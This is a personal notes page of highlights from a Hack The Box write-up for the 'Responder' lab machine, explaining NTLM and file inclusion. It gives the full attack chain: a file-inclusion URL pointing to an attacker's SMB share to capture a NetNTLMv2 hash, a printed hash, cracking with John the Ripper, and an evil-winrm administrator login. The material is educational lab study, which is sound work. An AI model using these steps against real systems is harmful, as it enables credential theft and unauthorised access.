Responder Write-up - Nikola's Digital Garden

#readwise # Responder Write-up ![rw-book-cover](https://readwise-assets.s3.amazonaws.com/media/reader/parsed_document_assets/292353064/YKqLjcrQx3df1eZVyvIgINMxfVWN_fK1tVLteL4_Vyc-cove_1Sz3y74.png) ## Metadata - Author: [[Hack The Box]] - Full Title: Responder Write-up - URL: https://readwise.io/reader/document_raw_content/292353064 ## Summary Microsoft uses NTLM and Kerberos for user authentication. Despite its vulnerabilities, NTLM is still common due to compatibility with older systems. This guide explains how to exploit a File Inclusion vulnerability on a Windows web server to capture user credentials. By using tools like Responder and John the Ripper, attackers can retrieve and crack NTLM hashes. ## Highlights - Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol that basically uses Simple Object Access Protocol to interact with remote computers and servers, as well as Operating Systems and applications. WinRM allows the user to: ^wi5cag - Remotely communicate and interface with hosts - Execute commands remotely on systems that are not local to you but are network accessible. - Monitor, manage and configure servers, operating systems and client machines from a remote location. ([View Highlight](https://read.readwise.io/read/01jrjwb6da0ymse8e47svnr9a7)) --- LFI or Local File Inclusion occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application. A common example is when an application uses the path to a file as input. If the application treats this input as trusted, and the required sanitary checks are not performed on this input, then the attacker can exploit it by using the `../` string in the inputted file name and eventually view sensitive files in the local file system. In some limited cases, an LFI can lead to code execution as well. ([View Highlight](https://read.readwise.io/read/01jrjwea7x0g2cak5tzdbwg63t)) ^capa1e --- RFI or Remote File Inclusion is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc. ([View Highlight](https://read.readwise.io/read/01jrjwep4m8cw1p7abhhwzbs73)) ^39wj5o --- We know that this web page is vulnerable to the file inclusion vulnerability and is being served on a Windows machine. Thus, there exists a potential for including a file on our attacker workstation. If we select a protocol like SMB, Windows will try to authenticate to our machine, and we can capture the NetNTLMv2. ([View Highlight](https://read.readwise.io/read/01jrjx17k46v57cptmac55z7d6)) --- NTLM (New Technology Lan Manager) is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. It is a type of single sign-on (SSO) because it allows the user to provide the underlying authentication factor only once, at login. ^lddbrw - The NTLM authentication process is done in the following way: ^j7l1av 1. The client sends the user name and domain name to the server. 2. The server generates a random character string, referred to as the challenge. 3. The client encrypts the challenge with the NTLM hash of the user password and sends it back to the server. 4. The server retrieves the user password (or equivalent). 5. The server uses the hash value retrieved from the security account database to encrypt the challenge string. The value is then compared to the value received from the client. If the values match, the client is authenticated. A more detailed explanation of the working of NTLM authentication can be found [here](https://www.ionos.com/digitalguide/server/know-how/ntlm-nt-lan-manager/). ^pzd6ym ([View Highlight](https://read.readwise.io/read/01jrjx281bc4ksaz44tgdqa7x5)) --- In the PHP configuration file `php.ini `, `allow_url_include` wrapper is set to "Off" by default, indicating that PHP does not load remote HTTP or FTP URLs to prevent remote file inclusion attacks. However, even if `allow_url_include` and `allow_url_fopen` are set to "Off", PHP will not prevent the loading of SMB URLs. In our case, we can misuse this functionality to steal the NTLM hash. Now, we can refer to [this blog](https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/) and can attempt to load an SMB URL, and in that process, we can capture the hashes from the target using [Responder](https://github.com/lgandx/Responder). ([View Highlight](https://read.readwise.io/read/01jrjx5jq9zscg6p8w39rmh8x6)) --- Responder can do many different kinds of attacks, but for this scenario, it will set up a malicious SMB server. When the target machine attempts to perform the NTLM authentication to that server, Responder sends a challenge back for the server to encrypt with the user's password. When the server responds, Responder will use the challenge and the encrypted response to generate the NetNTLMv2. While we can't reverse the NetNTLMv2, we can try many different common passwords to see if any generate the same challenge-response, and if we find one, we know that is the password. This is often referred to as hash cracking, which we'll do with a program called John The Ripper. ([View Highlight](https://read.readwise.io/read/01jrjx74esmprrzjfswntn8gw1)) ^hsckx1 --- To start with, if the Responder utility is not already installed on the machine, we clone the Responder repository to our local machine. ```sh git clone https://github.com/lgandx/Responder ``` Verify that the Responder.conf is set to listen for SMB requests. With the configuration file ready, we can proceed to start Responder with `python3`, passing in the interface to listen on using the `-I` flag: ```sh sudo python3 Responder.py -I tun0 ``` ([View Highlight](https://read.readwise.io/read/01jrjx9br2t0eb3g2f2ap9b7hd)) --- The network interface can be checked by running the `ifconfig` command in the terminal. In the case of Kali Linux or the HTB Pawnbox, Responder is installed by default as a system utility, thus it can be launched just by running the command ```sh sudo responder -I {network_interface} ``` ([View Highlight](https://read.readwise.io/read/01jrjxasq9r7fj4qy89meybgwm)) --- With the Responder server ready, we tell the server to include a resource from our SMB server by setting the page parameter as follows via the web browser: `http://unika.htb/?page=//10.10.14.25/somefile` In this case, because we have the freedom to specify the address for the SMB share, we specify the IP address of our attacking machine. Now the server tries to load the resource from our SMB server, and Responder captures enough of that to get the NetNTLMv2. ([View Highlight](https://read.readwise.io/read/01jrjxbmmdsq6h7pp87ycxtfgw)) --- We can dump the hash into a file and attempt to crack it with john , which is a password hash-cracking utility. ```sh echo "Administrator::DESKTOP- H3OF232:1122334455667788:7E0A87A2CCB487AD9B76C7B0AEAEE133:0101000000000000005F3214B534D801 F0E8BB688484C96C0000000002000800420044004F00320001001E00570049004E002D004E0048004500380044 0049003400410053004300510004003400570049004E002D004E00480045003800440049003400410053004300 51002E00420044004F0032002E004C004F00430041004C0003001400420044004F0032002E004C004F00430041 004C0005001400420044004F0032002E004C004F00430041004C0007000800005F3214B534D801060004000200 000008003000300000000000000001000000002000000C2FAF941D04DCECC6A7691EA92630A77E073056DA8C3F 356D47C324C6D6D16F0A001000000000000000000000000000000000000900200063006900660073002F003100 30002E00310030002E00310034002E00320035000000000000000000" > hash.txt ``` ([View Highlight](https://read.readwise.io/read/01jrjxckjxqa8ba8f6wkm58r9v)) --- We pass the hash file to `john` and crack the password for the Administrator account. The hash type is automatically identified by the john command-line tool. `-w` : wordlist to use for cracking the hash ```sh john -w=/usr/share/wordlists/rockyou.txt hash.txt ``` `john` will try each password from the given password list, encrypting the challenge with that password. If the result matches the response, then it knows it found the correct password. In this case, the password of the Administrator account has been successfully cracked. > password : badminton ([View Highlight](https://read.readwise.io/read/01jrjxd21w29pjet2mk58v7cvw)) --- We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) which is made for this kind of scenario. ```sh evil-winrm -i 10.129.136.91 -u administrator -p badminton ``` ([View Highlight](https://read.readwise.io/read/01jrjxemq5zbssy779e9bnwmg8)) ---